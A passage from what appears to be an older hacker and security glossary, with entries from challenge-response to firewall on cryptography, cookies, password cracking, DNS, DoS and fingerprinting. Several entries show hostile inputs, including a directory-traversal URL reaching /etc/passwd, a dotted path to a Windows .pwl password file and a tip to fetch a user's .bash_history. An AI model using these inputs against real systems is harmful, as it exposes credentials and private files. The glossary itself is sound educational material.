the client requests access
the server sends back random data
the client then encrypts/hashes the data using the password
the server checks the result

In this manner, the client proves it knows the correct password without ever sending it across the wire.

Key point: In most cases the user is prompted for the password, which the client then stores in memory. In the use of smart cards, however, the system may give the user the challenge string, which the user then types into the smart card. The smart card then produces a response, which the user must type back into the system. In this way, the user validates that they have the smart card.

Key point: Challenge-response systems are thought to be more secure because the challenge/response is different every time. This guards against replay attacks as well as making cracking more difficult.

chat [2]

Key point: Favorite because it provides real-time anonymous communication.

checksum [1] .

A technique for detecting if data inadvertently changes during transmission. The sender simply divides all the data up into two-character numbers, then adds all the numbers together. The receiver makes the same calculation, and checks the calculated checksum with the transmitted checksum. If they don't match, then the receiver knows the data was corrupted in transit.

Key point: Checksums are not secure against intentional changes by hackers. For that, you need a cryptographic hash.

cipher (decipher)[4]

In cryptography, the word cipher refers to an encryption algorithm. A cipher transforms the original data/message into pseduo-random data/message of the same length. In order to decipher the message, a reverse transformation must be applied.

Key point: A block cipher is one that encrypts a block of data at a time. For example, DES uses a block size of 64-bits. Each input block must correspond to exactly one output block (like a code-book). A block-cipher suffers from the fact the same data repeated in a message would be encoded in the same way. Consider a block size of 8-bit encrypting English text; you could therefore figure out all the letter 'e's in the cipher text because they are the most common letter used. Therefore, block-ciphers are often used in a chaining mode such that the same pattern will indeed be decrypted differently.

Key point: A stream cipher is essentially a chained block cipher with a block size of 1 (either 1-bit or 1-byte). It generates a keystream against which it XORs the plaintext, operating much like a one-time pad, though less secure in theory but more secure in practice.

ciphertext [4]

In cryptography, ciphertext refers to the data after it has been encrypted.

Contrast: clear-text, plaintext.

clear-text [4]

In cryptography, the term clear-text refers to messages that have not been encrypted. The word has the connotation of data that should be encrypted, but isn't (such as clear-text passwords).

Misunderstanding: The word "text" comes from traditional cryptography that meant the text of messages, though these days "text" can refer to binary computer data as well.

cmos [3]

When the system is powered off, some persistent BIOS settings are stored in a small bit of battery sustained RAM built using CMOS technology. The name "CMOS settings" have become synonmous with "BIOS settings". Some viruses have been known to corrupt these settings, resulting in a condition where the machine can no longer boot. Simply setting a jumper to disconnect the battery backup will restore the settings back to factory defaults.

code-book [4]

In ancient times, a code-book was a book where you looked up a word, and replaced with another word according to the substitution table in the book. For example, you might look up the words "attack at dawn" in the book and come up with the words mouse dog cat that you send to your troops. The troops recieving the message would likewise look up these words in their code-books in order to figure out the original message.

Key point: In block-ciphers, the key represents a code-book. In other words, you could use the key to generate a huge book of matching pairs whereby each plaintext block would match to exactly one ciphertext block. Then, you could encrypt messages by looking them up in this table.

Key point: The term ECB or Electronic Code-Book refers to the use this mode of using a block-cipher. However, since it leaks information, many people prefer to chain blocks of ciphertext and plaintext together in order to make sure that the same pattern will be encrypted differently when it appears multiple times in a message.

compiler [1]

In programming, a compiler takes human readable source code and converts it into the binary code that the computer can understand.

Key point: A compiler is a form of lossy compression and one-way encryption. All the information meaningful to humans is removed from the code leaving only the information necessary for the computer. This means that humans can no longer easily read the resulting program directly. Because of the "one-way" nature of the operation, programs cannot be used to recover the existing source code. This effect is different in various languages. C++ is the worst language in terms of decompilation; Java is the best. Most Java applets can be decompiled back to some semblance of their previous form. This has led to a market for programs that further obfuscate Java binaries in an effort to hide the original source code. Some compilers do leave human-readable symbols behind for debugging purposes. They won't reveal the original source, but can still be useful for reverse engineering They can be "stripped" from the binary.

complexity [3]

In computer science, complexity measures how difficult a problem is to solve. The problem is that while we may know of an algorithm that solves a problem, it will take a computer too long to solve it.

The best way to understand complexity is to consider the ancient parable (Babylonian?) about a king and a wise subject who did a favor for him. The subject asked for one piece of grain to be placed on the first square of a chess board, two grains on the second, four grains on the third, and so on, doubling the amount of grain for each successive square.

1 2 4 8 16 --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

--- --- --- --- --- --- --- ---

The question is: how much grain does this come out to? Your possible choices are:

a few handfulls
a few buckets
several wagon's full of grain
all the grain produced by the kingdom in a year
more than the combined total ever harvested by mankind

The problem is known as having exponential complexity. The average computer scientist, when confronted with this problem, would intuitively guess the correct answer, which is that the amount of grain is a billion times a billion, or more than all the grain ever harvested by mankind.

1 2 4 8 16 32 64 128
256 512 1024 2048 4096 8192 16384 32768
65536 131072 262144 524288 1048576 2097152 4194304 8388608
16777216 33554432 67108864 134217728 268435456 536870912 1073741824 2147483648
4294967296 8589934592 17179869184 34359738368 68719476736 137438953472 274877906944 549755813888
1099511627776 2199023255552 4398046511104 8796093022208 17592186044416 35184372088832 70368744177664 140737488355328
281474976710656 562949953421312 1125899906842624 2251799813685248 4503599627370496 9007199254740992 18014398509481984 36028797018963968
72057594037927936 144115188075855872 288230376151711744 576460752303423488 1152921504606846976 2305843009213693952 4611686018427387904 9223372036854775808

Example: Let's say that a dictionary was not sorted. This means that you would have to start at the bigging and look at every word until you found the definition you were looking for. This is an algorithm with linear complixity. The time it takes you to lookup a word in such a dictionary is related to the number of words in the dictionary: if you double the size of such a dictionary, you will double the amount of time it takes to lookup a word. In other words, the time to lookup a word in this dictionary is on the order of the size of the dictionary. This is expressed as O(n), where n is the size of the dictionary.

Example: Dictionaries are sorted before printing. This means that you can quickly find the word you are looking for. In terms of complexity we are more interested in how much longer it will take you to lookup a word if we double the size of the dictionary. In other words, the Oxford English Dictionary (OED) is about 8 times larger than a more abridged English dictionary. However, it only takes about 3 times longer to lookup a word in the OED. As the problem size grows, the amount of effort it takes to figure out the problem grows less slowly. If the OED were 16-times larger, then it would take only 4-times longer to search. If the OED were 32-times larger, it would take only 5-times longer to search. This mathematical relationship is known as a logarithm. The increase in computing power needed to solve such a problem grows on the order of the logarithm of size of the problem. This is expressed as O(logn). Logarithm problems are much easier to solve than linear ones, which is why we sort dictionaries.

Example: The chessboard problem mentioned above is similar to encryption keys. Every additional square on the chessboard doubles the size of the problem; every additional bit added to a key doubles the amount of time it would take to crack it. This means that a 32-bit key would take roughly a billion trials in order to crack, a 64-bit key would be roughly a billion times harder than that to crack, and a 128-bit key is a billion billion times harder to crach than a 64-bit key. This complexity is expressed as O(2ⁿ).

Key point: The following table shows the complexity of some algorithms.

big-O complixity problem = 8 elements problem = 32 elements

O(logn) logarithmic 3 seconds 5 seconds

O(n) linear 8 seconds 32 seconds

O(n²) quadratic 1 minute 15 minutes

O(n³) cubic 9 minutes 9 hours

O(2ⁿ) exponential 4 minutes 136 years

Note that deceptive nature that for a problem size of 8, our exponential algorithm is actually faster than the cubic algorithm. But if you were to choose this in order to solve a problem of size 32, then it would not complete in your life-time.

compression [1]

Key point: Since encrypted data is essentially random data, you cannot compress it. This defeats networking standards designed to automatically encrypt traffic (such as modems). Therefore, data must be compressed before it is encrypted. For this reason, compression is becoming an automatic feature to most encryption products. The most often used compression standard is gzip and its compression library zlib.

con [2]

Slang term for convention. Popular conventions are:

DEFCON: Held in the summer in Las Vegas.
HOPE: "Hackers On Planet Earth" put on by 2600 mag.

cookie [1] .

Cookies are small bits of data that a website can place on your system, requesting your browser to send them back to the website the next time you visit. Cookies are a way of making personalizing website, and in general making the whole web experience better.

Misconception: Cookies are not a security/privacy risk. However, when combined with HTTP Referer field and cross-site imbedded images, they can be used to track user's activities. Users have sued sites like DoubleClick that have massive cross-site imbedded images over the privacy information they collect. Cookies receive most of the blame for this.

Example: The biggest privacy hole is when cookies are combined with the HTTP Referer field. If many sites imbed images (like advertisements) from a single site, that single site can use cookies in order to track a user going among those sites. The cookie does not identify who the user is, but can track what the user does. Other information, like web-site logons, can then be combined with this information in order to track how the person is.

Example: JavaScript has a long history of problems with cookies such that one website can retrieve the cookie information for another website. Since cookie information often contains username/password information, this can compromise the site.

Key point: Turning off cookies is not practical. The best you can hope for is "cookie management" -- choose which sites you want to allow cookies for but deny them to all the rest.

covert channel [4]

Key point: One rootkit uses ICMP as a covert channel. It creates a virtual TCP-like circuit inside of ping packets.

Key point: Covert channels can become extremely covert. In theory, one can create a covert channel where only the IP identification field (16-bits) carries the data.

Key point: URLs and DNS queries pass through virtually everything (including proxies). Therefore, it is easy to export information from inside a company to the outside using this technique.

crack [2]

To decrypt a password, or to bypass a copy protection scheme. See crackz for more about copy protection.

History: When the UNIX operating system was first developed, passwords were stored in the file /etc/passwd. This file was made readable by everyone, but the passwords were encrypted so that a user could not figure out who a person's password was. The passwords were encrypted in such a manner that you could test a password to see if it was valid, but you really couldn't decrypt the entry. (Note: not even administrators are able to figure out user's passwords; they can change them, but not decrypt them). However, a program called "crack" was developed that would simply test all the words in the dictionary against the passwords in /etc/passwd. This would find all user accounts whose passwords where chosen from the dictionary. Typical dictionaries also included people's names since a common practice is to choose a spouse's or child's name.

Contrast: A "crack" program is one that takes existing encrypted passwords and attempts to find some that are "weak" and easily discovered. However, it is not a "password guessing" program that tries to login with many passwords, that is known as a grind

Key point: The sources of encrypted passwords typically include the following:

/etc/passwd from a UNIX system
SAM or SAM._ from a Windows NT system
<username>.pwl from a Windows 95/98 system
sniffed challenge hashes from the network

Key point: The "crack" program is a useful tool for system administrators. By running the program on their own systems, they can quickly find users who have chosen weak passwords. In other words, it is a policy enforcement tool.

Tools: on UNIX, the most commonly used program is called simply "crack". On Windows, a popular program is called "l0phtCrack" from http://www.l0pht.com.

cracker [1]

A specific type of hacker who decrypts passwords or breaks software copy protection schemes (creating "crackz").

Controversy: See the word hacker for a disagreement about the way that "cracker" is used in the computer enthusiast community vs. the security community.

CRC (Cyclic Redundancy Check)[2]

A form of a checksum that is able to detect accidental transmission errors. It is used on Ethernet in order to detect packet errors. It is also used on some operating systems in order to detect accidental errors in programs before running them.

Key point: Like a checksum, a CRC is not able to detect intentional changes.

crackz [2]

Patches for programs that bypass copy protection schemes.

Culture: Cracking programs is its own little underground 'scene' independent of other hacking activities. Groups and individuals often compete to be the first to break a new copy protection scheme in popular programs. There are many sites that catalogue cracked programs.

credentials [4]

Your authentication information, such as a password, token, or certificate. Since not all systems require a password to login, we use the more abstract term "credentials" to refer to this informatin.

cron [3]

On UNIX, the cron daemon automated background tasks (such as backups or rotating the logs). It is really the simplest of programs; it reads instructions from a file and executes the appropriate programs at the scheduled time.

Key point: When the machine is compromised, intruders will often put backdoor jobs into the crontab. When the victim tries to clean up his/her machine, the jobs in the crontab will run giving the intruder control again. This sort of thing happened in the famous attack against the New York Times; they kept cleaning up the machine, but cron kept giving control back to the intruder. Typically, these jobs would run during the wee hours of the morning when nobody is looking.

cryptanalysis [4]

In cryptography, cryptanalysis is the discipline of trying to break (or attack) encryption algorithms. The goal is to find some way of cracking a message that is easier than a brute force attack.

Key point: The different kinds of cryptanalysis are:

chosen plaintext: Where the attacker can construct plaintext in order to see how it is encrypted.
known plaintext: Where the attacker has copies of both the original plaintext as well as the encrypted text. Since most data is "structured" in some fashion (such as all e-mails have similar headers), it is likely that some plaintext will always be available for attack.
differential cryptanalysis: A chosen plaintext attack. When attacking an algorithm, the attacker attempts to feed different messages into the system looking for patterns in the output ciphertext.
linear cryptanalysis: A known plaintext attack. The attacker needs a large quantity of known plaintext (and corresponding ciphertext) in order to build up a statistical model.
algebraic: Looks for mathematical properties within the algorithm. For example, some algorithms when encrypting twice with keys A and B can be still be decrypted in one step with a key C. (The algorithm is known as a group).

cryptography [1]

History: So far, there are four major eras in cryptography.

Ancient times: Simple tricks were used among the Romans to encrypt and hide messages.
World War II: The dawn of "infowar" where code-breakers constituted an important part of the war effort, and machines were used on a wide scale to encrypt messages.
DES: The standardization of DES made encryption suddenly available to the masses. DES itself wasn't nearly as important as the spark it provided for the research into cryptography, and the developement of cryptography as a feature in products.
public-key encryption?: Before this point, cryptography concentrated on preventing your enemy from eavesdropping on you messages. This was done by sharing some secret ahead of time, then using that secret to decode the encrypted message. Public-key cryptography secure messages to be sent without any previously shared secret. This detail seems insignificant, but it has huge implications. For example, you can seemlessly create a encrypted connection to an e-commerce server and purchase products safe from eavesdropping because of public-key cryptography, but would not be able to with traditional cryptography. Thus, the huge economic distortions caused by e-commerce would probably not be possible without that one insignificant fact.

cryptographic [3]

Secured against hostile attack.

The best example is the "checksum" vs. "hash".

A checksum verifies that data hasn't been corrupted unintentionally. For example, all IP packets are checksumed in case they corrupted accidentally between sender and receiver.

A cryptographic hash verifies that data hasn't been corrupted intentionally. Hackers can (and do) alter IP packets between the sender and receiver in order to carry out an attack. Since IP's checksum is not cryptographically secure against hackers.

There are two features that are required in order to be cryptographic. The first is that the algorithm be secure against attack. A checksum uses simple addtion, while hashes use a complex set of mathematical operations. The second is that the key must be of a sufficient size in order to prevent brute force attacks. The IP checksum is only two-bytes long, so that even if the algorithm were secure, it would require only 65536 tries for the hacker to get it right, which can be done in real-time.

culture [2]

TODO: (This section will contain pointers about the hacking underground. If you've got any ideas, please e-mail them to me: hacking-dict @ robertgraham.com).

Dress code

Anything black.

Fiction

Cyberpunk, Ender's Game by Orson Scott Card

Age

Teens

Music

Loud

movie

War Games (1983): This movie launch a generation of hackers in the early 1980s, creating hords of war-dialers.
Hackers (1995): The "War Games" of the 1990s. While dumb down to match the general public's tastes, they did actually consult with the hacker underground.
The Net (1995): A storry about a victim who uses her hacking skills to get back at the evil hackers you have taking over her life.

cyberpunk [2]

Part of the hacker culture, cyberpunk refers to a subgenre of science ficition dealing with cybernetics. To some, it refers specifically to a small literary movement of the 1980s that is now over. To others, it is generally any sci-fi story with strong cybernetic elements.

Key points: The two defining books of cyberpunk are Neuromancer by William Gibson and Snow Crash by Neal Stephenson. Neuromancer is considered "hard core" cyberpunk that launched the genre.

- D -

daemon [2]

On UNIX, a daemon is a program running in the background, usually providing some sort of service. Typical daemons are those that provide e-mail, printing, telnet, FTP, and web access.

datagram [4]

In protocols, a datagram is a single transmission that stands by itself. They are often known as unreliable datagrams because there is not guarantee that they will reach their destination. It is up to some higher protocol or application to verify that a datagram reaches its destination. Streaming media (audio/video/voice) often use datagrams because it doesn't really matter if a few are lost in transmission.

DDoS (Distributed Denial of Service)[2]

A DDoS attack is one that pits many machines against a single victim. An example is the attacks of February 2000 against some of the biggest websites. Even though these websites have a theoretical bandwidth of a gigabit/second, distributing many agents throughout the Internet flooding them with traffic can bring them down.

Key point: The Internet is defenseless against these attacks. The best defense is for ISPs to do "egress filtering": prevent packets from going outbound that do not originate from IP addresses assigned to the ISP. This cuts down on the problem of spoofed IP addresses.

deface [2]

The average web server is vulnerable to being exploited, either compromised directly giving full control to the hacker, or at least to the point where the hacker can replace web pages. Therefore, sites are being hacked every day.

Key point: There are sites, like http://www.attrition.org that catalogue defaced sites and mirror the defaced web-pages.

Key point: Defaced web-pages is an important part of hacker attitude.

Key point: Elite hackers rarely deface web-pages, they instead break in and control the server for other nefarious purposes that yield more profit.

Key point: Web servers are easy to deface because the average OS and web server contains vulnerabilities (defaults and samples) upon installation. It takes extensive effort to harden a server.

defaults [3]

The "defaults" are the settings of a system before it has been configured.

Key point: Security irritates customers who prefer products that are easy to use. Therefore, most vendors make the same trade off. They ship their systems with the best "out-of-box" experience, and as a result most boxes are easily hacked in their default state. The more a vendor touts its ease-of-use, the more likely hackers will find that vendor's products easy to hack.

See also: samples

DES (Data Encryption Standard) [3]

In cryptography, DES (Data Encryption Standard) is the most popular algorithm for encrypting data. It is standardized by the United States government (ANSI X9.17) as well as the ISO.

Key point: DES ushered in a new era of cryptography. Before DES, strong encryption was only available to large governments and militaries. Cryptography research was similarly limitted. Anything that the average person might use could easily be cracked by a major government. DES created a well-defined, easily verifiable security architecture that was available to anyone. DES-capable products flooded the market. Beyond making encryption products available to anyone, DES essentially created the cryptographic community. Before DES researchers toiled away under government/big-business secrecy, After DES, cryptogrpahy become a normal computer-science subject. Whereas DES itself was developd by secretive government agencies (NSA) and mamoth corporations (IBM), DESs replacement will likely be created by relatively independent researchers and the cryptographic community as a whole.

dictionary [3]

In hacking circles, a dictionary is simply a list of words that plug into cracking programs in order to break passwords. Such dictionaries not only contain real words, but words that people might choose for passwords (example: NCC1701, which is the serial number for the starship Enterprise in Star Trek).

Key point: It takes only a couple minutes to run through hundreds of thousands of words in a dictionary in order to crack a password. Therefore, never choose a word that might be in a dictionary.

directory climbing (directory traversal) [3]

A common bug that is the source of many compromises. This bug comes about because a program does not parse the filename given to the program but simply passes it off to the system. Therefore, by prefixing file names with "../../..", the hacker can force the program to read any file on the system.

Example: Many programs contain built-in HTTP servers. This allows the program to be remotely managed from any web browser. These servers expect that only the files in their own directory and below will be read. However, hackers can still provide URLs that go up directories, and down into other directories in order to read any file from the system. For example, a hacker might be able to read the UNIX password file by typing in the URL: http://www.robertgraham.com/../../../etc/passwd.

Key point: This bug occurs because programmers frequently forget to doublecheck input.

Example: This bug is common. The original version of Win95 had this bug, so that if you had access to File and Print Sharing to any subdirectory, you also had access to the entire system. A huge number of HTTP servers and CGI scripts have this bug. Many FTP servers have had this bug.

Key point: Win9x has the quirk that three dots "..." means "two directories up", four dots "...." means "three directories up", and so on. Additionally, whereas on many UNIX systems going up past the top directory automatically generates an error, going above the top directory on Windows leaves you in the top directory. Therefore, filenames like "............/Windows/greg.pwl" are frequently seen: the hacker puts more than enough dots in the path in order to guarantee they reach the root directory.

Key point: Many popular Windows "personal web servers", including several versions shipped from Microsoft, have had either the "../.." or "....." vulnerability. In particular, since the "....." issue is not widely know, it is very common among those products that fix the first variant. FrontPage98 from Microsoft shipped with this bug.

DMZ (Demilitarized Zone)[3]

In firewalls, a DMZ is an area that is mostly public to the Internet. This is where a companies web, e-mail, and DNS servers are located. A DMZ often has some limited protection, but since it is very exposed to the Internet, the assumption is that the machines in the zone will eventually be compromised. Therefore, the machines often have as little connectivity to the private network as any other machine from the Internet.

DNS (Domain Name System)[3]

Analogy: When calling somebody via the telephone, you can lookup their name in the phone book in order to find the telephone number. DNS is a similar directory service. When contacting a web site, your browser looks up the name in DNS in order to find the IP number.

History: DNS is relatively new. When the Internet was small, every machine simply had a list of all other machines on the Internet (stored in /etc/hosts). Generally, people just had the IP addresses of machines memorized in much the same way that people memorize phone numbers today.

Key point: DNS is not needed for communication. If a DNS server goes down, newbies will think that the entire network is down. Hackers frequently deal with raw IP addresses, and indeed often bypass DNS entirely as it may give off signs of an attack.

Key point: The DNS hierarchy starts from the "top level domains" of .com, .net, .org, .edu, .giv, .mil, and the two-letter country codes (e.g. .us for United States, .jp for Japan).

Misunderstanding: Both IP addresses and domain names use dots: "www.robertgraham.com" vs. "192.0.2.133". This has no significance; the usage of these dots is basically unrelated. Trying to match things up one-to-one is wrong (i.e. ".com" == "192.").

Analogy: What is your phone number? If I asked you this, you might give me both your home number and your cell phone number. I can reach you at either one. In much the same way, the a domain name like www.yahoo.com can have multiple IP addresses. Every time you visit that site, you might go to a separate IP address. You can test this out yourself. Go to the command-line and type "ping www.yahoo.com". Notice how it comes back with an IP address that it pings. After that runs, try it again. Notice how the second time it is pinging a different IP address.

Details: DNS provides a number of resource records (RR):

A
^ The normal record that contain an name to IP address mapping.
LOC
^ The geographic location containing latitude, longitude, altitude, and size. Altitude is meters above sea level. Size is the exponent in the in meters of the volumetric size of the object. Hackers sometimes use these records to find where you are located physically.
Humor: The original name of this record was ICBM.
HOST
^ HOST records can contain information about the machine, such as if it is a Windows or UNIX machine. Administrators probably should not fill them in; they are dangerous.

DoS (Denial of Service) [3]

A ^	The normal record that contain an name to IP address mapping.
LOC ^	The geographic location containing latitude, longitude, altitude, and size. Altitude is meters above sea level. Size is the exponent in the in meters of the volumetric size of the object. Hackers sometimes use these records to find where you are located physically. Humor: The original name of this record was ICBM.
HOST ^	HOST records can contain information about the machine, such as if it is a Windows or UNIX machine. Administrators probably should not fill them in; they are dangerous.

An exploit whose purpose is to deny somebody the use of the service: namely to crash or hang a program or the entire system.

Example: Some classes of DoS are:

flooding the victim with more traffic than he can handle
flooding a service (like IRC) with more events than it can handle
bomb
crashing a TCP/IP stack by sending corrupt packets
crashing a service by interacting with it in an unexpect way
hanging a system by causing it to go into an infinite looop

Example: The Ping of Death exploit crashed most machines vintage 1995 by sending illegally fragmented packets at a vicitm.

Culture: A common word for DoS is "nuke", which was first popularized by the WinNuke program (a simple ping-of-death expoit script. These days, "nukes" are thos DoS exploits that script kiddies in chat rooms use against each other.

dropper [2]

In viruses and trojans, the dropper is the part of the program that installs the hostile code onto the system.

dumpster diving [2]

AKA trashing

Key point: Dumpster diving is generally legal, as long as you are not trespassing.

- E -

eggdrop(eggies) [2]

In the IRC wars, robot programs are used to keep people logged in on channels, and to remotely control channels. These programs are known by the most popular variant called "eggdrop".

elite [2]

The mythical creature that inhabits the top ranks of the hacker underground.

Culture: Really became popular after the 1995 movie Hackers.

Culture: This word finds itself mangled in many variations: eleet, leet, 1337, 31337, etc.

Statistics: Ira Winkler, former analyst at the NSA and now writer, estimates that as of 1999, that there are roughly 500 to 1000 "elite" hackers capable of finding new security holes, and roughly 5000 hackers capable of creating exploit scripts. (He further estimates about 100,000 script kiddies).

encryption [3]

In cryptography, encryption applies mathematical operations to data in order to render it incomprehensible. The only way to read the data is apply the reverse mathematical operations. In technical speak, encryption is applies mathematical algorithms with a key that converts plaintext to ciphertext. Only someone in posession of the key can decrypt the message.

Analogy: Some aliens come down to earth and give you a safe, and a key to the lock. For purposes of this discussion, the aliens use some magic technology that is beyond our human understanding, and that we will never be able to break into the safe. You steal something, put it into the safe, and lock it up with the key. You hide the key. The police arrest you and confiscate the safe. The only way the police will ever recover this stolen object is when you give them the key. Encryption is the same way; it creates an unbreakable box that you can put data in that nobody can ever get back out unless they have the appropriate key.

Controversy: Encryption has massive philosophical implications when put into widespread use. It means that citizens can hide their data from governments (especially repressive ones) and law enforcement (especially when you are committing a crime). This has the potential of making governments more accountable to the populace. It likewise has the potential of making crime easier.

Key point: Encryption tends to be the strongest link in the chain. When encryption is cracked, it is usually through some other weakness like key distribution or weak passwords.

Contrast: Asymmetric encryption uses different keys for encryption and decryption. Since the most useful form of this is one you keep one key private and make the other public, this is better known as public key encryption. In contrast, symmetric encryption uses the same key for both encryption and decryption.

Notes: Some algorithms popular in cryptography are: DES, rc4 Some popular applications that use encryption are: PGP, web browsers. Some protocols that use encryption are: SSL, IPsec

escrow [3]

In general, escrow means to hold something aside in case of eventualities.

Analogy: For example, one company provide software that another company sells imbedded in their hardware. The second company (the OEM) is scared that the first company might go out of business, so requests that the first company put the source code for the software in escrow. Should the first company go out of business, the second company would still be able to sell their product.

Key point: Law enforcement is constantly pushing for key escrow where a third party holds back-door keys to all encryption products. Law enforcement would then be able to obtain these keys with a court order into order to decrypt messages or eavesdrop on communications. They first propose a variant of the two-person rule in order to prevent abuse of the system. Note that the general problem is called key recovery (in which law enforcement can recover the key using some means); key escrow is just one way of doing key recovery.

Ethernet [3]

Ethernet is the "classic" technology to interconnect machines in a local area.

Key point: Every Ethernet adapter has a unique 6-byte MAC address. The first 3-byte identify the manufacturer, the second 3-bytes are assigned by the manufacturer. If two adapters have the same MAC address, then communications errors will occur (just as if you named both your kids "George", then they'll be confused as to which one you are talking to). Making the adapter addresses globally unique then assures that they will be locally unique when plugged into the same LAN. However, it has security/privacy impliciations. A chain of events led to the MAC addresses becoming imbedded into Microsoft Word documents, which helped track down the author of the Melissa virus. Similarly, Network ICE's products scan the intruder with a number of protocols that may reveal the MAC address of an intruder.

Key point: Ethernet was originally designed as a "shared medium", which means that every adapter on the wire sees all traffic. In normal operation, an Ethernet adapter discards all traffic that doesn't contain its MAC address. However, that filter can be turned off, putting the adapter in promiscuous mode. This converts the machine into a sniffer which can eavesdrop on everyone's traffic.

Format:

The basic format of an Ethernet frame is:


+--------+--------+--------+--------+--------+--------+

|  Destination MAC Addresss                           |

+--------+--------+--------+--------+--------+--------+

|  Source MAC Addresss                                |

+--------+--------+--------+--------+--------+--------+

|  EtherType      |

+--------+--------+

...

payload

(46-bytes to 1500-bytes)

...



+--------+--------+--------+--------+

| CRC                               |

+--------+--------+--------+--------+

These days, the most common payload is IP which is identified with an EtherType of 0x0800. Note that as soon as the payload leaves the local Ethernet (through a router), the local Ethernet headers are stripped off. Only the payload itself will traverse the Internet; local Ethernet information (like your MAC address) does not. (Hackers might still be able to retrieve your MAC address through NetBIOS or SNMP, though).

Note that the CRC protects against accidental corruption of the frame, but not intentional corruption.

executable [1]

Anything that can "run" on a computer.

Example: ActiveX, Java, JavaScript, .exe files, programs.

exploit [2]

A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it.

Culture: Exploits, or "exploitz", are the root of the hacker culture. Hackers gain fame by discovering an exploit. Others gain fame by writing scripts for it. Legions of script-kiddies apply the exploit to millions of systems, whether it makes sense or not.

Controversy: There is no good definition for this word. It is debated a lot trying to define exactly what is, and is not, an exploit.

Key point: Since people make the same mistakes over-and-over, exploits for very different systems start to look very much like each other. Most exploits can be classified under major categories: buffer overflow, directory climbing, defaults, samples, Denial of Service

- F -

factorization [4]

In public key cryptography, we hunt for mathematical operations that are easy to do in one direction, but difficult to do in the opposite direction. For example, you (with pen+paper) can easily calculate the value of n in:

127 X 131 = n

In constrast, try to find the values of m and n in the following equation using a pen and paper.

m X n = 24289

The second equation above is known as factorization. It is difficult to not only do by hand, but also by computers.

Key point: Note that in the example above, I use a small number (24289) simply to demonstrate that multiplication is easier than factorization. Somebody sent me e-mail proposing that factoring 24289 is not too difficult, you simply brute-force calculate 24289/n for all n between 1..24289, and the results that are integers are factors. However, in cryptography, the numbers used are actually much larger, and look something like:

6237804950192837659018341982347561398740112837491903875781783635465346657897987894783717848757929837483241243454656677787898908978775756362515414353646768798980798873897890141298374873838929102938578

Using the combined computing power of all the world's computers, it would take longer than a billion times the age of the universe to use the simple technique to solve this problem. Actually, longer, but I'm trying to use comprehensible numbers. Remember that if I add a digit to the number I'm trying to factor, it will take ten times longer to compute. For example, the number 242891 takes ten times longer to search through than 24289. Likewise, every nine digits you add to a number causes the search to take a billion times longer. There are several mathematical techniques easier than brute-force factorization, but all of them are hard.

Key point: Currently, it is unknown exactly how difficult factoring numbers is. Today's public-key infrastructure would crumble if someone found an easy to way to factor such numbers.

fail-safe (fail-open, fail-close) [3]

A philosophic point of view. When a system fails, how should it leave things: secure or unsecure? For example, if a firewall crashes, should it disable all network connectivity, or should it allow network connectivity to continue unprotected? A lot of security vulnerabilities occur because designers make the wrong choice. It is often easier to cause a system to fail than to break through it, so security items should probably fail in such a way to result in greater security at the expensive of stopping everything.

Confusion: The terms "fail-open" and "fail-close" are frequently used to mean the opposite of each other. Some people think of a door, which when "open" allows things to pass through. Other people think of an electrical circuit, when "open" stops the flow of current (and conversely, a "closed" circuit passes current). Therefore, use the word "fail-safe" instead in order to avoid confusion.

Analogy: The electrical circuit-breakers in your home are fail-safe switches using this concept. In the case of an electrical fault causing a short, the circuit breaker will blow open, halting the flow of electricity. This prevents a fire from starting.

File and Print Sharing [1]

In Win95 and Win98, File and Print Sharing is the name of the service that allows home users to share files (and printers) among their home machines. The printer may be hooked up to one machine, then other machines within the household can print to that printer. Similarly, a user may share a directory, which other members of the household can connect to.

Key point: The problem is that TCP/IP knows no boundaries. When a user tells the system to share files with the rest of the familly, the user is not quite aware that this means the files are shared with the rest of the Internet. This means that anybody, anywhere on the Internet can at any time connect to the machine and read/write files. To see if somebody has accidentally shared their hard-disk, right-hand-mouse-click on "Network Neighborhood" in Windows, select "Find Computer...", then type in that user's IP address.

Key point: File and Print Sharing used the SMB protocol over NetBIOS on TCP port 139.

finger [1]

In UNIX, the finger service provides information about a users. Fingering a user, such as running the command "finger rob@robertgraham.com", will often display the contents of the .plan file. Fingering no specific user, such as finger @robertgraham.com, will list all the users who are logged on. Fingering users is often done during the reconnaissance phase of an attack.

Example: The following shows the output of the command "finger rob@rh5.robertgraham.com":


Login: rob                              Name: Robert David Graham

Directory: /home/rob                    Shell: /bin/bash

On since Fri Dec  3 18:13 (PST) on ttyp0 from gemini

No mail.

No Plan

Key point: The finger command reveals extensive information. For example, if I were attacking the above machine, I would notice that the user is running bash Therefore, I might try something like http://rh5.robertgraham.com/~rob/.bash_history against the user, which in about 1% of the cases will give me a history file of recent commands they've entered, which might contain passwords and such.

fingerprint [3] .

A common scan hackers perform nowadays is fingerprinting a system in order to figure out what operating system it is running. The two main types of fingerprinting are Queso, which sends weird TCP flags, and nmap, which sends weird TCP options. Narrowing down the operating system is important. For example, attempting Windows-specific hacks against a UNIX system is pointless. Fingerprinting is possible because the TCP/IP specifications do not fully define the behavior of a protocol stack. Therefore, by sending unusual (undefined) network traffic at a system, the hacker will receive responses unique to that system.

Key point: One of the key reasons for fingerprinting a system is to search for "old" or "unusual" systems. Non-computer devices like routers, printers, modem banks, etc. are not written to the same level of security standards as real computers. In addition, a hacker might be able to find old SunOS 4 systems which are rife with well-known security flaws.

firewall [1]

A device that isolates a network from the Internet. The word is derived from construction, where "firewalls" isolate areas of a building in order to stop a fire from spreading.

A firewall acts as a "choke point". Corporations install firewalls between their internal (private) networks and the (public) Internet. All traffic between the corporation and the Internet flows through the firewall. It acts as a "gate" with virtual guards that examines the traffic, and decided whether to allow it or block it.

Misunderstanding: Many people believe that a firewall makes your network immune to hacker penetration. Firewalls have no ability to decide for themselves whether traffic is hostile or benign. Instead, the administrator must program the firewall with rules as to what type of traffic to allow or deny. This is similar to a guard checking badges at a gate: the guard can only detect if the badge is allowed/denied, but cannot detect impersonations or somebody climbing the fence in the back.

Key point: Firewalls are based on the principle of blocking everything by default and only allowing those things that are absolutely necessary.

Key point: Firewall administrators are frequently at odds with their management. Executives are frequently frustrated by things that don't work in the network. They don't understand how difficult it is to secure each new application, or the increased risks involved.

Controversy: A lot of time is wasted on trying to come up with the exact definition of the word "firewall", usually by marketing flaks or nerds with attitude. The term isn't well defined. Most people equate firewalls with packet filters. Others include proxy servers and NATs along with the definition.

